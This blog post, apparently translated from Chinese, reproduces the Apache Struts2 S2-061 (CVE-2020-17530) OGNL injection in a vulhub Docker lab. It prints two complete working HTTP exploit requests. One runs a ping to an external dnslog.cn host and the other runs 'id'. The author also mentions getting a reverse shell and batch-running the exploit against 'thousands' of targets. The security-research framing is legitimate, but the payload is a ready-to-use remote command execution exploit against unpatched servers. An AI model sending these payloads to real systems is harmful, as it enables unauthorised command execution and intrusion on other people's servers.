I have been paying attention to the Struts2 S2-061 vulnerability recently, and I just had time to represent this vulnerability today.
Struts2 s2-061 Remote command execution Vulnerability reappears
I. Introduction of vulnerabilities
The Apache Struts2 framework is a Web framework for developing Java EE Web applications. Apache Struts disclosed S2-061 Struts Remote Code Execution Vulnerability (CVE-2020-17530) on December 08, 2020. OGNL expression injection vulnerability may exist in the use of some tags and other situations, resulting in remote code execution, which is extremely risky.
Second, impact version
Apache Struts 2.0.0-2.5.25
Third, vulnerability recurrence
Docker environment address:
Project Address:
https://github.com/vulhub/vulhub/tree/master/struts2/s2-061
Copy the code
Pull image boot environment:
docker-compose up -d
Copy the code
Access target address:
http://192.168.1.107:8080/
Perform DNSlog authentication vulnerability:
POST /index.action HTTP/1.1 Host: 192.168.1.107:8080 Accept-encoding: gzip, deflate Accept: */* Accept-language: En User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; X64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Connection: close Content-type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF Content-Length: 846 ------WebKitFormBoundaryl7d1B1aGsV2wcZwF Content-Disposition: form-data; name="id" %{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.Value Stack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack )).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(# emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("exclude dPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("ping p0fai2.dnslog.cn")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#argli st))} ------WebKitFormBoundaryl7d1B1aGsV2wcZwF--Copy the codeDNGlog record
Id of the exp command
POST /index.action HTTP/1.1 Host: 192.168.1.107:8080 Accept-encoding: gzip, deflate Accept: */* Accept-language: En User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; X64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Connection: close Content-type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF Content-Length: 827 ------WebKitFormBoundaryl7d1B1aGsV2wcZwF Content-Disposition: form-data; name="id" %{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.Value Stack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack )).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(# emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("exclude dPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("id")).(#execute =#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))} ------WebKitFormBoundaryl7d1B1aGsV2wcZwF--Copy the codeSimple Python script validation executes:
Alternatively, rebound shell can be successfully executed:
Batch run thousands of successful less :(may be the default index path is not correct) back to study.
Four, safety suggestions
Upgrade the Apache Struts framework to the latest version.
A link to the
Cwiki.apache.org/confluence/…
Reference:
www.safedog.cn/news.html?i…
www.cnblogs.com/potatsoSec/…
Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!
Disclaimer: Copyright belongs to the author. Commercial reprint please contact the author for authorization, non-commercial reprint please indicate the source.
Subscribe for more revisited articles and study notes
thelostworld
Safe road, side by side with you !!!!
Personal knowledge: www.zhihu.com/people/fu-w…
Brief personal book: www.jianshu.com/u/bf0e38a8d…
Personal CSDN: blog.csdn.net/qq\_3760279…
Personal blog garden: www.cnblogs.com/thelostworl…
